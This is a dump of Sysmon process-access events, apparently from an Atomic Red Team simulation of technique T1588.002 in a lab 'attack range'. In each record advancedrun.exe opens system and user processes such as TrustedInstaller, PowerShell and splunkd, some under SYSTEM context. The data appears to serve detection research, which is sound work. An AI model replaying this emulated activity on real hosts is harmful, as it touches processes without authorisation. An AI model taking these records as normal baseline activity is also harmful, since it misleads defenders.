17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983104Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F419-61EA-6A04-000000002702}4528C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983103Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983102Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program 
Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983101Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983100Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet 
Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983099Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983098Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983097Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983096Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983095Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983094Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983093Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983092Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983091Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983090Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983089Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
